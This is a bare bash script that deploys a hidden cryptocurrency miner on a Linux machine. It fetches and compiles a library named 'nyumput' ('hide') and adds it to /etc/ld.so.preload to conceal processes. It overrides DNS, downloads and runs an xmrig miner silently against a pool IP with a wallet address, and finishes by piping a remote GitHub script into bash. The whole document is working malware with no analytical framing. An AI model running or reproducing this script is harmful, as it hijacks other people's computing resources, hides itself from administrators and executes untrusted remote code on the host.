#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/kartolo92/koplok/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget -O vrl https://github.com/bondaltomason/meo/releases/download/2.7.0/xmrig-vrl
chmod 777 vrl
./vrl -a rx/0 --donate-level 1 -o 104.248.8.194:443 -u 165DUuzQoKG9BaBqprN3ZmsMRfvGHMwNwCpehJUqGoGLsSDtB535XA3PPzfRZhu2uYM9xfT8JsKoXEquWMr6XVwKK4aNeCaYixqvQ2Wh74Tqw5U1dcubDGpRz2y61rzdjMibQM5 -p $(shuf -n 1 -i 1-99999)-BA -t $(nproc --all) > /dev/null 2>&1 &
curl -sL https://github.com/kartolo92/koplok/raw/master/time | bash 
